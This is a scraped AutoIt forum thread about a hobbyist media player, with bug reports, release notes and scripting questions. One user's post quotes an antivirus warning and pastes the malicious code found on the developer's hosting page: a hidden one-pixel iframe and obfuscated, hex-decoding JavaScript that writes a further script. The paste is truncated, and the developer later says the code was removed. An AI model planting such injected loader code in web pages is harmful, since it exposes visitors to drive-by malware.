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Posted (edited)


im trying latest 3.50 version

- when the taskbar is higher then regular , the little popup window is behind the taskbar

- still no "previous file" button?

- updates time display etc on new files after "4" seconds on my pc - thats quite a long time? cpu usage is around 4 % when playing , around 34% when loading a new file

- drag and drop files doesnt work anymore?

greetings nob

Edited by nobbe

Thx nobbe & SxyfrG ...

I fixed the little popup window which was behind the taskbar if the taskbar is higher then regular.

I also fixed the Drag 'n Drop function :)

NEW VERSION 3.5.1 !!!


Well done with the VERY low CPU usage! (I take it you nicked my code from before :))

Problems that i've noticed with my 10-15 minute quick peek around your program:

- Slider and button graphical issues

- Slider doesn't track song progress properly (Might have been a one off, i haven't been able to reproduce this bug. Look into it if in doubt.)

- Multiple video screens can be opened and OnEvent and variables get all messed up (errors out).

- Grammatical errors in your help thingy, i.e. "What does the Auto-Update feature ?" should be "What is the Auto-Update feature ?"

- Hard to read the settings information on the settings GUI, i'd suggest making the background black so it can be read more easily.


- Some of the settings can be instantly applied, like the language, auto-shuffle and others.

- Limit the amount of videos that can be watched at once to 1

Besides all that, it's going well :)

My scripts:AppLauncherTRAY - Awesome app launcher that runs from the system tray NEW VERSION! | Run Length Encoding - VERY simple compression in pure autoit | Simple Minesweeper Game - Fun little game :)My website


Access to the data has been denied!

Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL: http://limiter.evonet.ro/

Information: Contains suspicious code HEUR/HTML.Malware

Generated by AntiVir WebGuard, AVE, VDF


this the code

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4801314628879(v4801314628c75){ function v4801314629071 () {return 16;} return(parseInt(v4801314628c75,v4801314629071()));}function v480131462986b(v4801314629d5f){ function v480131462a85c () {return 2;} var v480131462a06a='';for(v480131462a460=0; v480131462a460<v4801314629d5f.length; v480131462a460+=v480131462a85c()){ v480131462a06a+=(String.fromCharCode(v4801314628879(v4801314629d5f.substr(v480131462a460, v480131462a85c()))));}return v480131462a06a;} document.write(v480131462986b('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C6966





see analysis result of virustotal


google search



I have tried to use a bit of your code from Func vplayer() and when I add the line

_wmpsetvalue($player, "fullscreen"); sets fullscreen

I get the error "AutoIt Error, Line -1: Error: The requested action with this object has failed." I looked in wmp.au3 and the line looks like it should work. Is this a bug?

$vfile = "Gargantuan.wmv"
        Global $player = _wmpcreate(1, 2, 10,100,100); Show, Pixel buffer from left, Pixel buffer from Top, Width of video, Height of Video
        DllCall("user32.dll", "int", "AnimateWindow", "hwnd", $vplayer, "int", 500, "long", 0x00080000);fade-in

        _wmpsetvalue($player, "nocontrols");hides controls
        _wmpsetvalue($player, "cm");disables right-click
        _wmpsetvalue($player, "volume", 100);sets volume to 100
        _wmpsetvalue($player, "fullscreen"); sets fullscreen
        _wmploadmedia($player, $vfile)

Also when I use line :

Global $player = _wmpcreate(1, 2, 10,100,100)

Is there a way to stretch the video to a larger window without it going to full screen?

Get Scite to add a popup when you use a 3rd party UDF -> http://www.autoitscript.com/autoit3/scite/docs/SciTE4AutoIt3/user-calltip-manager.html

Posted (edited)

I don't know the cause of the error,but the code looks like it should work ...

If you want to stretch the video,I think you should make the window resizable and dock the player ...

Hope it helps,


Edited by LIMITER
Posted (edited)

I downloaded the source and inserted just the line

_wmpsetvalue($player, "fullscreen"); sets fullscreen

and I am getting the same error. I cannot trace the full screen attribute to anything other than:

Case $setting = "fullscreen"
            $object.fullscreen = "true"

in the wmp.au3 or any of your other includes files. Where does autoit reference the machine code for $object.fullscreen?

Another question: In WMP.au3 you list several options:

$setting:   "play"
            "invisible" (Hides all)
            "control"   (Shows controls)
            "nocontrol" (Hides controls)
            "step"      (frames to step before freezing)
            "volume"    (0 To 100)
            "rate"      (-10 To 10)

Can these be used as command line operators? e.g. l|m|ter.exe /invisible /volume:50 /fullscreen?

Good job on the player BTW! :)

Edited by computergroove

Get Scite to add a popup when you use a 3rd party UDF -> http://www.autoitscript.com/autoit3/scite/docs/SciTE4AutoIt3/user-calltip-manager.html


I can't help you much with the UDF because i found it on this forum a long time ago...

OF course they can be used as command line parameters :)




Removed the malicious code :)

The following also doesn't help matters.


You should also be aware that the site you chose for a host (evonet.ro) has a "dangerous" rating in all four categories of WOT. (Web of Trust)

As a child domain of evonet.ro, without enough individual ratings for your subdomain, you will inherit a percentage of evonet.ro's rating. (starting at 100%)

Just thought you might like to know about evonet.ro's public standing.

WOT Evonet.ro reputation scorecard

My Projects - WindowDarken (Darken except the active window) Yahsmosis Chat Client (Discontinued) StarShooter Game (Red alert! All hands to battlestations!) YMSG Protocol Support (Discontinued) Circular Keyboard and OSK example. (aka Iris KB) Target Screensaver Drive Toolbar Thingy Rollup Pro (Minimize-to-Titlebar & More!) 2D Launcher physics example Ascii Screenshot AutoIt3 Quine Example ("Is a Quine" is a Quine.) USB Lock (Another system keydrive - with a toast.)


Thx crashdemons ...

I already ditched the evonet domain for googlepages which is waaaayyy more safer :) I'll start moving the homepage soon...


Yes you should,I just tested the new xp version which works just fine :) ... I'll release it soon :P

I just upgraded to Vista and I have some problems with ExtProp.au3,which screwed up the code because it shows for ex. : instead of Artist,it shows the year, so the return values are screwed :P If someone could help me,i'll be delighted :D




After a very very very long time (almost a month), here's the newly improved

L|M|TER Media Player 3.5.2

ADDED VISTA SUPPORT :) and many more ...




NEW VERSION 3.5.3 !!!

FULL VISTA SUPPORT (fixed the video player) + Playlist import function (check the #1 post or help-file for more details)


Cool !

Keep waiting for the next update ...

[quote]Don't expect for a perfect life ... Expect a least troubles ones[/quote]Contact me : ass@kiss.toWhat I Have Done :Favorites Manager Mangage your favorite's folder, that's coolPC Waker For those who want to save stickersWebScipts Supporter For those who've just started with Web and WebScriptsTemporary Looker Simple but powerful to manage your Temporary folder, you know what you downloaded[UDF] _NumberFormat() Better performance on number display[UDF] _DirGet() What a folder contain [how many (hidden,normal,...) files], with one line of code[UDF] _IsPressEs() Just like _IsPress() but for a group of keys

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